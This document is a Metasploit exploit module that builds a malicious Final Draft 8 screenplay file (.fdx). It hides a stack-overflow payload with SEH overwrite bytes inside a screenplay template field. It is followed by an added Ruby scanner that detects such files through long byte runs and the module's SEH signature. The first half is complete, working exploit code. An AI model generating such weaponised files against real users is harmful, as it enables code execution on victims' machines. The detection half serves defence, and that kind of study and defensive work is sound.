require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Final Draft 8 File Format Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in Final Draft 8.
        Multiple fields are vulnerable to the overflow, however in is the only
        field to accept mixed-case characters.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'vt [nick.freeman@security-assessment.com]' ],
      'Version'        => '$Revision: 10394 $',
      'References'     =>
        [
          [ 'URL', 'http://security-assessment.com/files/documents/advisory/Final_Draft-Multiple_Stack_Buffer_Overflows.pdf' ]
        ],
      'Payload'        =>
        {
          'Space'          => 1024,
          'BadChars'       => "\x00",
          'DisableNops'    => true,
          'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'EAX',
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Default', { } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Nov 29 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'evil.fdx']),
      ], self.class)
  end

  def exploit
    # Screenplay template; REPLACE_1 marks the field that receives the overflow.
    template = %Q| ‘BONES’ Teaser Int. Someplace perfectly normal -- day An unassuming crime scene roped off with yellow crime scene tape. Various cops and Feds pick over the spot. Booth is leading Brennan to a dusty, desiccated corpse. Special agent Booth (pointing to corpse) Right here. No one knows what to make of it. Brennan Well, that’s why I’m here. The default font for this template is Courier Final Draft. Notice that scenes are numbered at left and right margins and that the Act Breaks are in bold type. More forensic banter leads us to the end of the teaser. End of teaser Act 1 Int. Smithsonian medico-legal lab -- day Brennan, Zack, Hodgins and Booth are all standing around the exam table where the corpse has been laid out. Zack He’s been dead for a while now. Dr. Jack hodgins Your genius is terrifying. Booth enters looking frustrated. 
Special agent booth Any results yet? I got some serious heat on me about this case. BRENNAN It’s not cut and dried, Booth. If you look at the occipital blah blah blah and the traces of silt located in the blah blah blah ... SPECIAL AGENT BOOTH So it’s going to take a little more time? Begin musical montage: (”Some cool song” by some cool band) -- “Bones” often features a montage of work or investigation set to a modern song. -- The montage intro and end are designated by scene headings in boldface as seen above and below. -- The scenes in the montage are entered just as pieces of action with the two dash intro . -- Like this. End musical montage Int. Brennan’s co-op / brennan’s bedroom -- Night Brennan enters, exhausted, collapses on bed. Cut to: Int. Medico-legal building / angela’s area -- day Angela is standing at the laser imaging table and the reconstruction of the corpse’s face is just becoming visible. She sees something amazing. She picks up her cell phone and dials. Angela (into phone) Yeah, I think you might want to come back in. “Bones,” being an hour-long drama, has a teaser and four acts . End of act one Act four Int. Booth’s vehicle / traveling -- day Action here. BRENNAN Dialogue here. Mystery solved. End show
BONES - Ep# - .
BrennanAREPLACE_1
.
Bones " Episode Title " written by Writer's Name Production company name Address Line 1 draft name Address Line 2 City, State Zip code MM DD , YYYY Bones " Episode Title " CAST DR. TEMPERANCE "BONES" BRENNAN ANGELA MONTENEGRO SPECIAL AGENT SEELEY BOOTH DR. JACK HODGINS DR. CAMILLE SAROYAN DR. LANCE SWEETS Bones " Episode Title " Sets Interiors : Exteriors : Smithsonian medico-legal Lab Brennan's co-op/brennan's bedroom Medico-legal building/angela's area Booth's vehicle/travelling
Brennan DR. JACK HODGINS Special agent booth Angela CAMILLE (V.O.) (O.S.) (O.C.) (SUBTITLE) INT EXT I/E DAY NIGHT AFTERNOON MORNING EVENING LATER MOMENTS LATER CONTINUOUS THE NEXT DAY CUT TO: FADE IN: FADE OUT. FADE TO: DISSOLVE TO: BACK TO: MATCH CUT TO: JUMP CUT TO: FADE TO BLACK.
|

    seh  = "\x77\x72\x78"      # is null terminated
    nseh = "\x49\x39\x22\x77"  # this address + 16h points to the stack

    sploit = template.gsub(/REPLACE_1/, "\x40"*7756+payload.encoded+("\x41"*(2268-payload.encoded.length))+nseh+seh)

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
  end
end
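The module above fills one screenplay field with roughly 10 KB of filler (7756 bytes of 0x40, the encoded payload, 0x41 padding) and closes it with the nSEH/SEH bytes. The following triage check is an added example for the defender side; it is not part of the module or of Metasploit. It reads a candidate .fdx file as raw bytes and flags it when the longest run of a single repeated byte exceeds a threshold (4096 is an assumed value; real screenplay fields never hold that much of one character) or when the module's exact nSEH+SEH byte sequence is present. The sample inputs are constructed inline and use an inert placeholder in place of shellcode.

```ruby
# Added example (not the module's code): byte-level triage of .fdx files for
# the overflow pattern used above. Two heuristics, no XML parsing required:
#   1. longest run of one repeated byte exceeds RUN_THRESHOLD (assumed value);
#   2. the nSEH + SEH bytes from the module appear in file order.

RUN_THRESHOLD = 4096  # assumption: no legitimate FDX field holds 4 KB of one byte

# nSEH followed by SEH, as written into the file. SEH is NUL-terminated in the
# file, so only the three bytes the module writes are matched.
SEH_CHAIN_SIGNATURE = "\x49\x39\x22\x77\x77\x72\x78".b

# Returns [byte, run_length] for the longest run of one repeated byte,
# or [nil, 0] for empty input.
def longest_byte_run(data)
  best_byte, best_len = nil, 0
  cur_byte, cur_len = nil, 0
  data.b.each_byte do |b|
    if b == cur_byte
      cur_len += 1
    else
      cur_byte, cur_len = b, 1
    end
    if cur_len > best_len
      best_byte, best_len = cur_byte, cur_len
    end
  end
  [best_byte, best_len]
end

# Returns an array of human-readable findings; empty means nothing flagged.
def scan_fdx(data, run_threshold: RUN_THRESHOLD)
  findings = []
  byte, len = longest_byte_run(data)
  if len > run_threshold
    findings << format("run of 0x%02x repeated %d times (threshold %d)", byte, len, run_threshold)
  end
  if data.b.include?(SEH_CHAIN_SIGNATURE)
    findings << "known nSEH/SEH overwrite bytes present"
  end
  findings
end

def suspicious_fdx?(data)
  !scan_fdx(data).empty?
end

# Constructed samples (not real files): a benign screenplay fragment, and a
# field laid out the way the module lays it out, with an inert placeholder
# where the encoded payload would sit.
BENIGN_SAMPLE = "Int. Smithsonian medico-legal lab -- day\nBrennan enters.\n"
fake_payload = "PAYLOADPLACEHOLDER" * 10
MALICIOUS_SAMPLE = ("\x40" * 7756) + fake_payload +
                   ("\x41" * (2268 - fake_payload.length)) +
                   "\x49\x39\x22\x77" + "\x77\x72\x78"

if __FILE__ == $0
  # Usage: scan_fdx(File.binread("suspect.fdx")) on a real file; here the
  # constructed samples are scanned instead.
  [["benign", BENIGN_SAMPLE], ["constructed overflow", MALICIOUS_SAMPLE]].each do |name, data|
    findings = scan_fdx(data)
    puts "#{name}: #{findings.empty? ? 'clean' : findings.join('; ')}"
  end
end
```

The run-length heuristic is the one worth keeping in a scanner, because it does not depend on the specific SEH addresses (which change with the build of Final Draft); the signature match is cheap and catches this exact module's output. A parser-based check that measures each XML text node against a sane field length would be the stricter version of the same idea.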